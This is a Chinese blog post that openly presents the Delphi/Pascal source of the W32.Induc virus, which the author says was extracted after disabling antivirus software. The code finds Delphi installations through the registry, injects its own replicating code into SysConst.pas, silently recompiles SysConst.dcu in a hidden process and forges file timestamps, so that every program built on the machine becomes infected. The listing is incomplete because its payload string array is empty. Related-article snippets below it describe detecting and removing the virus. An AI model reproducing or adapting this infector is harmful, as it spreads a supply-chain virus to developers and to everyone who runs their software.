针对delphi的病毒 W32.Induc 源码

最新推荐文章于 2018-03-01 17:49:17 发布
最新推荐文章于 2018-03-01 17:49:17 发布
阅读量857 收藏
点赞数
文章标签: delphi string 杀毒软件 function dll c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guizicjj/article/details/4473323
版权

把杀毒软件禁止掉后,终于把DLL中的PAS源程序剥出来了,供大家欣赏:

uses windows;

var sc:array[1..24] of string=(
function x(s:string):string;
var i:integer;
begin for i:=1 to length(s) do
    if s[i]:=#36 then
    s[i]:=#39;
    result:=s;
end;

procedure re(s,d,e:string);
var f1,f2:textfile;
h:cardinal;
f:STARTUPINFO;
p:PROCESS_INFORMATION;
b:boolean;
t1,t2,t3:FILETIME;
begin
    h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);
    if h<>DWORD(-1) then
    begin
     CloseHandle(h);
     exit;
     end;
{$I-}assignfile(f1,s);
    reset(f1);
    if ioresult<>0 then
        exit;
    assignfile(f2,d+$pas$);
    rewrite(f2);
    if ioresult<>0 then
    begin
        closefile(f1);
        exit;
    end;
     while not eof(f1) do
     begin readln(f1,s);
         writeln(f2,s);
          if pos($implementation$,s)<>0 then
          break;
    end;
    for h:= 1 to 1 do
        writeln(f2,sc[h]);
    for h:= 1 to 23 do
        writeln(f2,$$$$+sc[h],$$$,$);
    writeln(f2,$$$$+sc[24]+$$$);
$);
    for h:= 2 to 24 do
        writeln(f2,x(sc[h]));
    closefile(f1);
    closefile(f2);
{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$ ));
     fillchar(f,sizeof(f),0);
     f.cb:=sizeof(f);
     f.dwFlags:=STARTF_USESHOWWINDOW;
    f. wShowWindow:=SW_HIDE;
    b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0, f,p);
    if b then
        WaitForSingleObject(p.hProcess,INFINITE);
    MoveFile(pchar(d+$bak$), pchar(d+$dcu$));
    DeleteFile(pchar(d+$pas$));
    h:=CreateFile(pchar(d+$bak$),0,0,0,3, 0,0);
      if  h=DWORD(-1) then
          exit;
     GetFileTime(h,@t1,@t2,@t3);
     CloseHandle(h);
    h:= CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);
    if h=DWORD(-1) then exit;
    SetFileTime(h, @t1,@t2,@t3);
     CloseHandle(h);
end;
 
procedure st;
var  k:HKEY;
c:array [1..255] of char;
i:cardinal;
r:string;
v:char;
begin
    for v:=$4$ to $7$ do
    if RegOpenKeyEx( HKEY_LOCAL_MACHINE,pchar($Software/Borland/Delphi/$+v+$.0$),0,KEY_READ,k)=0 then
    begin
        i:=255;
        if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then
        begin
            r:=$$;
            i:= 1;
             while c[i]<>#0 do begin r:=r+c[i];
            inc(i);
        end;
        re(r+$/source/rtl/sys/SysConst$+ $.pas$,r+$/lib/sysconst.$,$"$+r+$/bin/dcc32.exe" $);
    end;
    RegCloseKey(k);
end;
end;

begin st;

end. 

土人猿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
japussy(delphi病毒)研究使用
08-21
码,研究使用,大家在不读懂的情况下不要运行。{我们交流的是技术,展示的代码和相关代码的目的只是为了说明技术的原理和使用。如果任何个人或组织利用本文档发布的技术进行破坏,应由其本人负责。}
某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等
Purpleendurer@CSDN
09-05 2813
某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等该网网页包含代码:/---<iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0></iframe>---/#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm 包含代码:/---<i
文件卫士病毒检测报告(virscan.org)
9.歌工作室
03-01 1512
文件卫士病毒检测报告(virscan.org) virscan.org:http://r.virscan.org/language/zh-cn/report/ec577c45a88ccddd8eaffb9274991a9f VirSCAN.org Scanned Report : 扫描结果:2%的杀软(1/49)报告发现病毒 时间: 2019-04-20 17:24:03...
delphi梦魇病毒--解决方法
注重长远 天天积累 cqujsjcyj
08-24 304
    &lt;!--StartFragment --&gt; Win32.Induc.A别名:Virus.Win32.Induc.a(金山毒霸)Virus.Win32.Induc.a(Kaspersky)W32.Induc(Mcafee)Virus:Win32.Induc.A(Microsoft)病毒类型:Virus(病毒)  大小: 约5 KB影响平台:微软Windows操作系统Win32...
[严重警惕]感染delphi编译器的SysConst.dcu病毒
weixin_30917213的博客
08-24 271
大家检查下delphi安装目录lib下的SysConst.dcu文件,大小如果为17KB左右,则是被感染了。SysConst.dcu正式大小应该为12KB不到。如不解决,将导致Delphi编译出的所有程序都带有病毒...目前我发现的是D6 D7都被感染,而且潜伏期超过3-5个月..也就是说我这3-5个月中编译的程序都带有这个病毒...T_T无意间成了病毒传播的帮凶了.其他版本的Delphi也请自检...
[转帖]发现感染DELPHI病毒
weixin_30732825的博客
08-19 154
DELPHI盒子与DELPHI群里看到的,据说只感染DELPHI7以下的版本(包含DELPHI7),貌似N多人中招了。感染此病毒后,所有用DELPHI编译的程序全都有感染能力。如果在 C:\Program Files\Borland\Delphi7\Lib 发现有 SysConst.bak (12KB) 和SysConst.dcu (18KB),那么恭喜你,中招了。该病毒没有exe或者dll的...
gs921w32.exe
07-13
gswin32c.exe: 版本gs921w32.exe,分享给有需要的人,。。。。。。。。。。。
gs952w32.exe
05-26
pdf转jpg过程中需要的支持软件。ImageMagick需要本软件(gs952w32.exe)的支持才能进行转换。
W32.Downadup.B专杀
12-12
【标题】"W32.Downadup.B专杀"是一个针对特定计算机病毒的解决方案,它主要设计用于清除名为"W32.Downadup.B"的恶意软件。W32.Downadup.B,也被称为Conficker或Kido蠕虫,是2008年末至2009年初广泛传播的一种计算机...
编译PHP5.217码或PHP扩展,需要的文件bindlib-w32.zip、win32build.zip
最新发布
01-13
这里,我们主要关注两个关键文件:`bindlib-w32.zip`和`win32build.zip`。 `bindlib-w32.zip`很可能包含的是用于Windows平台的BIND库,这是一个广泛使用的DNS服务器软件,其库文件在编译PHP与DNS功能相关的扩展(如...
W32.Downadup病毒专杀工具.rar
07-29
W32.Downadup病毒专杀工具.rar
我是个delphi菜鸟,竟然可以编出病毒,天哪!(ZT)
nlife的专栏
11-05 1307
今天刚刚打开delphi,在form中加入webbrowser组建&一个button,然后在button中加入代码‘webbrowser1.GoBack;’,点击run,天哪瑞星居然报告发现病毒“Trojan.Clicker.Delf.dk ”,将project删除了,我晕。    ...... 
病毒攻击Delphi
hety
08-19 93
你用delphi吗?请检查一下你的C:\Program Files\Borland\Delphi7\Lib\sysconst.dcu, 如果是17k,请立刻删除,用原始.pas重新编译,避免扩散。 我朋友的产品刚发布即收到卡巴斯基来信提示,发现可能是由于使用某一控件而感染,被迫将所有产品重新编译发布。 [quote] cnbeta 该病毒名为Win32.Induc,专门感染由Del...
今天发现Delphi编译出来的程序报病毒了。
wangyunyong0905的专栏
08-20 2019
这两天在写一个小程序时,突然编译出来的程序运行后报 Students.exe    Win32/Induc.A 病毒 的变种  我晕的,然后我在国外的网站也看到有这样的报道,现在这种病毒只影响delphi 5、6、7,具体的解决方法有:1、升级最新的病毒库2、在delphi/lib目录下找找看有没有sysconst.bak的文件,如果有说明已经中毒,把sysconst.bak恢复成sy
使用DELPHI编译的程序出现病毒的解决方法
独爱糕
11-05 1779
大家检查下安装目录lib下的SysConst.dcu文件,大小,如果为17KB,被感染了。目前5个杀毒,瑞星,卡巴,AVG等检测到了病毒!SysConst.dcu正式大小应该为12KB不到点点。lib/debug目录下有SysConst.dcu,SysConst.bak(改名回来)文件,替换回来就可以恢复正常!
build_w32.bat 闪退
11-04
build_w32.bat 闪退通常是由于一些常见问题引起的。以下是一些常见问题和解决方法: 1. 缺少必要的软件或库:在执行build_w32.bat之前,确保已安装所有必要的软件和库。这可能包括编译器、构建工具和其他依赖项。在闪退之前,你可以检查是否满足所有的先决条件,并进行必要的安装或更新。 2. 配置错误:检查build_w32.bat文件中的配置是否正确。可能存在错误的路径、输入参数或其他设置选项。确保所有的路径和设置都正确无误,并与你的系统环境相一致。 3. 内存不足:如果你的机器没有足够的内存来执行编译过程,那么build_w32.bat可能会闪退。尝试关闭其他的程序,释放一些内存资,然后重新尝试运行build_w32.bat。 4. 病毒或恶意软件:有时,电脑中的病毒或恶意软件可能会干扰批处理文件的正常执行。运行一个杀毒软件,确保你的系统是安全的,然后再次尝试运行build_w32.bat。 5. 编译脚本错误:build_w32.bat文件本身可能存在语法错误或其他错误。检查文件内容,确保没有任何明显的错误。如果有必要,尝试使用其他工具或方法来构建你的项目。 总之,build_w32.bat闪退可能有多种原因,你可以根据上述的解决方法来逐一排查。如果问题仍然存在,你可能需要更多的细节或错误消息来帮助我们更好地理解问题,并提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值